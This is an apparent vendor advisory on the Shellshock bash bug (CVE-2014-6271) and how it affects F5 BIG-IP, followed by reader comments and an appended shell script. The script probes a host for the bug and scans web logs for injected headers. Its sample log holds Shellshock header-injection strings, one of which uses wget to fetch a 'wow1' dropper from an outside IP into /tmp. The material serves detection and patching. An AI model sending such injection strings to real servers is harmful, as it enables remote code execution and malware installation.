CVE-2014-6271 Shellshocked
It's a good thing we are naming all of our vulnerabilities now; it's easier to keep track of them. I haven't seen an official designation for CVE-2014-6271, but Shellshock seems appropriate.
This new vulnerability may allow a remote attacker to execute commands on your system through a feature of the bash shell. A shell is a command-line user interface with features akin to a programming language. One of those features is that bash imports function definitions from its environment: when it starts, any environment variable whose value begins with "() {" is parsed as a function. Unpatched versions keep parsing past the end of the function body, so any commands appended after the closing brace are executed as well. Wherever attacker-controlled input (an HTTP header handed to a CGI script, an option sent by a DHCP server) is placed in an environment variable before bash is invoked, a remote user can therefore run commands.
F5 has confirmed that BIG-IP's web GUI is exploitable by an authenticated user. Apart from the DHCP client vector discussed below, we currently know of no unauthenticated exploits, either against the management interface or against the traffic interfaces.
We can walk through the attack vectors listed on Red Hat's security blog (not a comprehensive list) to look at the ways a BIG-IP could be exploited.
• BIG-IP does not use ForceCommand in sshd_config, so there is no ForceCommand restriction for an SSH user to bypass.
• BIG-IP does not contain any CGI programs written in bash, although it is possible that some CGI programs spawn subshells.
• BIG-IP does contain mod_php, but the PHP scripts it ships are not vulnerable.
• BIG-IP does contain the DHCP client dhclient, whose hook scripts run under bash with server-supplied option values in their environment, so it is in theory vulnerable to a malicious DHCP server. This is the only known unauthenticated, remotely exploitable vector at this time, and only the management interface uses DHCP, so only that interface is affected. You may disable DHCP on the System::Platform page.
• BIG-IP limits the use of bash to authenticated Administrator level accounts. Non-Administrators only have access to tmsh and do not have access to bash.
We still do not believe the traffic passing interfaces of a BIG-IP can be exploited. Please protect your management interface and ensure that it is not exposed to the internet.
F5 will be patching CVE-2014-6271 on all BIG-IP releases. Sol15629 has been published.
Update: A BIG-IP iRule mitigation has been posted. F5 LineRate has posted its mitigation. ASM has signature updates.
- daniel_spillers (Nimbostratus): "At this point, we do not believe the traffic passing interfaces of a BIG-IP can be exploited." Do you mean that traffic passing interfaces can't be used to attack the BIG-IP appliance itself? Or do you mean the traffic passing interfaces won't pass attacks to back-end servers?
- Emad (Cirrostratus): And what about ASM? Is F5 planning to release any signature for it?
- John_Alam_45640 (Historic F5 Account): Daniel: This article refers to the security of the BigIP platform itself. The F5 ASM can block such attacks on backend applications when the proper signature is available. This signature can come from F5 or can be user specified. Another option is an iRule. Check this iRule: https://devcentral.f5.com/s/feed/0D51T00006j49ZqSAI
- Simon_Waters_13 (Cirrostratus): Can you confirm the User-Agent injection in the management interface? https://twitter.com/ashk4n/status/515121090688196609
- Jeff_Costlow_10 (Historic F5 Account): We can confirm that the management GUI is vulnerable to an authenticated user. We will be patching this issue as soon as possible. "At this point, we do not believe the traffic passing interfaces of a BIG-IP can be exploited." The attack will be passed to back end servers. We do not believe that the attack could exploit a BIG-IP directly through the traffic interfaces.
- pmilot (Altostratus): Jeff, you say "At this point, we do not believe the traffic passing interfaces of a BIG-IP can be exploited." Does this apply to the APM module as well, given that it provides web services and serves web content through its service interface?
- Simon_Waters_13 (Cirrostratus): Mitigation link giving Server Error?
- Simon_Waters_13 (Cirrostratus): Thanks. In the twitter link they claim that apache is in the shadow group; this is not apparently the case on my F5 device. Can you provide clarity there too? Are these permissions on some devices, all devices, is it revealed in /etc/group or somewhere else? Not that I want them running commands as apache, but I want to understand fully what I'm reading. Happy to take it to the support ticket (already open) if you don't want to discuss here.
- Sam_Pickles_110 (Nimbostratus): Johny, a custom signature may be used in ASM to block Shellshock: https://auraredeye.zendesk.com/entries/56168065-Shellshock-CVE-2014-6271-Mitigation-Custom-ASM-signature This has been working well for us in production so far; we've blocked a lot of attempts, particularly over the past 24 hours.
- Network_Operat2 (Nimbostratus): 1) What about APM, used to check user certificates before passing the traffic on? That process is hosted by the F5 directly, and is exposed to anonymous users. 2) To all: ... check your www logs for this string: () { - saw lots of attempts to install wow1 last night. If your F5-hosted server is bash-enabled and unpatched... it may already be owned.
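As an added example (not part of the F5 post or of any commenter's advice), the following script does two things a BIG-IP administrator, or anyone with a Linux host behind a BIG-IP, would want at this point: it exercises the bash parsing bug described in the article directly, and it runs the "() {" log check recommended in the comments over Apache combined-format access log lines. The log lines, the IP addresses and the download URL are constructed for the example and are not real traffic; the field layout (request, referer, user agent as the three quoted fields) is the assumed Apache combined format.

```shell
# Added example, not F5 code. Run from any POSIX shell; the probe itself
# invokes bash explicitly because that is the shell with the bug.

# 1. Exercise CVE-2014-6271 directly. Pre-patch bash imports an environment
#    variable whose value starts with "() {" as a function and keeps parsing
#    past the closing brace, so "echo VULNERABLE" runs when the child bash
#    starts. A patched bash prints only "probe".
#    Prints one of: vulnerable, patched, no-bash.
shellshock_probe() {
    if ! command -v bash >/dev/null 2>&1; then
        echo "no-bash"
        return 0
    fi
    out=$(env x='() { :;}; echo VULNERABLE' bash -c 'echo probe' 2>/dev/null)
    case "$out" in
        *VULNERABLE*) echo "vulnerable" ;;
        *)            echo "patched" ;;
    esac
}

# 2. Constructed Apache combined-format lines (assumed format, fake traffic):
#    one payload in User-Agent (the "wow1" dropper pattern the comments
#    mention), one in Referer, and one benign request.
SAMPLE_LOG='203.0.113.5 - - [25/Sep/2014:03:14:07 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "() { :;}; wget -O /tmp/wow1 http://198.51.100.9/wow1"
198.51.100.23 - - [25/Sep/2014:03:15:11 +0000] "GET / HTTP/1.1" 200 1024 "() { :; }; ping -c 1 198.51.100.23" "Mozilla/5.0"
192.0.2.8 - - [25/Sep/2014:03:16:40 +0000] "GET /index.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0 (X11; Linux x86_64)"'

# scan_log reads log lines on stdin and prints, per hit:
#   <client ip> <field the payload arrived in> <command text after the function body>
# grep -F keeps "() {" literal; awk splits on double quotes so that
# $2 = request line, $4 = referer, $6 = user agent.
scan_log() {
    grep -F '() {' | awk -F'"' '
    {
        split($0, parts, " "); ip = parts[1]
        n = split("request referer user-agent", names, " ")
        field[1] = $2; field[2] = $4; field[3] = $6
        for (i = 1; i <= n; i++) {
            if (index(field[i], "() {") > 0) {
                payload = field[i]
                sub(/^.*\}[ \t]*;[ \t]*/, "", payload)   # strip "() { ... };"
                printf "%s %s %s\n", ip, names[i], payload
            }
        }
    }'
}

# Usage: probe this host, then scan the sample (replace the sample with
# "cat /var/log/httpd/access_log" or your own path).
shellshock_probe
printf '%s\n' "$SAMPLE_LOG" | scan_log
```

The probe is the same one-liner that circulated when the CVE was published, wrapped so the result is a single word that a fleet-wide check can collect. The log scan is deliberately literal: "() {" is the only token an attacker cannot change and still trigger the bug, so matching that substring in any quoted field catches header-based attempts regardless of which header was used.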